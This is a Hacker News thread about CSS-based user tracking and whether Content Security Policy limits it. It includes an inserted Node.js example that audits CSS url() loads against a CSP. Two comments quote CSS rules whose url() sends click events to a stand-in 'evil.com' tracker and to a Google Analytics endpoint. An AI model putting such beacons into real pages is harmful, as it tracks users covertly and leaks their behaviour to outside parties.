
Tracking Users with CSS (2018) - zinssmeister
https://www.templarbit.com/blog/2018/03/20/tracking-users-with-css/
======
saagarjha
This article seems to have a threat model where a website is “compromised”
into sending user data to a third party, but I don’t really see anything that
protects users from a website whose owner actively wants to track them. This
is an odd threat model to have.

Also, as an aside:

> For example, by detecting whether the browser supports the Calibri font
> family, we can assume that the browser is running in Windows

I’m pretty sure that Safari has stopped allowing the use of third party fonts
for exactly this reason, and now reports a standard set of fonts as being
available.

~~~
javajosh
You can't assume that only the origin will be serving css. Most pages these
days contain resources from all over the web, and most developers assume that
CSS is safe to load from anywhere. What's not clear to me is whether 'evil' in
_content: url("https://evil.com/track?action=link_clicked")_
can point to anywhere on the web? Or just the origin of the css? Or...?

~~~
IggleSniggle
Depends on the Content Security Policy of the site.

~~~
javajosh
Yes, of course - but what is the default if you don't have a CSP? I guess I
will have to do the experiment.

~~~
IggleSniggle
Apologies, wasn't trying to be snarky. If you are configured to allow
resources to load from anywhere, the CSS can load a resource from anywhere,
not just the location it originated from. These kinds of configurations are
increasingly less the default, however, so depending on your specific setup, you
may find that some origin policies are in place by default. This is entirely
dependent on your chain, however, including browser settings.
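
The CSP question in the sub-thread above, as an added example that is not part of the original comments: a simplified Node.js check of which `url()` loads in a stylesheet an `img-src`/`default-src` policy would permit, and what happens with no CSP at all. The function names, `cdn.example` and `site.example` are assumptions made for illustration, and the source matching is a reduced model of CSP, not a full implementation.

```javascript
// Added example: simplified CSP check for url() image loads made from CSS.
// Only img-src/default-src and http(s) URLs are modelled; not a full CSP engine.
function parseCsp(header) {
  const policy = Object.create(null);
  for (const part of header.split(';')) {
    const [name, ...sources] = part.trim().split(/\s+/);
    if (name && !(name.toLowerCase() in policy)) policy[name.toLowerCase()] = sources;
  }
  return policy;                                  // first occurrence of a directive wins
}

function sourceMatches(source, url, pageOrigin) {
  const s = source.toLowerCase();
  if (s === "'none'") return false;
  if (s === '*') return true;
  if (s === "'self'") return url.origin === pageOrigin;
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return url.protocol === s;   // scheme source, e.g. https:
  const m = s.match(/^(?:([a-z][a-z0-9+.-]*):\/\/)?([^/:]+)/);      // host source
  if (!m) return false;
  const [, scheme, host] = m;
  if (scheme && url.protocol !== scheme + ':') return false;
  return host.startsWith('*.')
    ? url.hostname.endsWith(host.slice(1))        // *.example.com matches subdomains only
    : url.hostname === host;
}

// Returns [{url, allowed}] for every url() in cssText. cspHeader === null means no CSP.
function auditCssUrls(cssText, cssUrl, pageOrigin, cspHeader) {
  const policy = cspHeader === null ? null : parseCsp(cspHeader);
  const sources = policy && (policy['img-src'] || policy['default-src']);
  const results = [];
  for (const m of cssText.matchAll(/url\(\s*['"]?([^'")]+)['"]?\s*\)/g)) {
    const url = new URL(m[1], cssUrl);            // relative URLs resolve against the stylesheet
    const allowed = !sources || sources.some(s => sourceMatches(s, url, pageOrigin));
    results.push({ url: url.href, allowed });
  }
  return results;
}

// Constructed sample: third-party stylesheet containing the rule quoted in the thread.
const css = `a:active::after { content: url("https://evil.com/track?action=link_clicked"); }
.logo { background-image: url(/img/logo.png); }`;
const cssUrl = 'https://cdn.example/theme.css', page = 'https://site.example';
console.log(auditCssUrls(css, cssUrl, page, null));   // no CSP: both loads allowed
console.log(auditCssUrls(css, cssUrl, page, "default-src 'self'; img-src 'self' https://cdn.example"));
```
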

------
Tepix
I like the idea of loading all linked content at page load time.

~~~
DaiPlusPlus
That’s bad for mobile - especially if a website has really large images for
high-DPI devices. I think you can configure some mobile browsers to always
download low-DPI assets to save on bandwidth.

~~~
Tepix
You could make it optional. Right now there's almost nothing you can do when
you visit a site even if you know it uses this technique.

------
jwilk
Previous discussion:

[https://news.ycombinator.com/item?id=16157773](https://news.ycombinator.com/item?id=16157773)

------
fawelo123
AFAIK doesn't work on Firefox.

~~~
fawelo123
And if you are using anything but Firefox you shouldn't worry about your
browser history anyway. Due to fingerprinting you give all of your browsing
history to Google regardless.

------
interfixus
CSS is fundamentally breaching the contract by messing in any way whatsoever
with content.

~~~
scegit
You can still do this

input[type="button"]:active { background-image: url('http://www.google-analytics.com/collect?v=1&_v=j23&a=...'); }

https://www.smashingmagazine.com/2014/10/css-only-solution-for-ui-tracking/

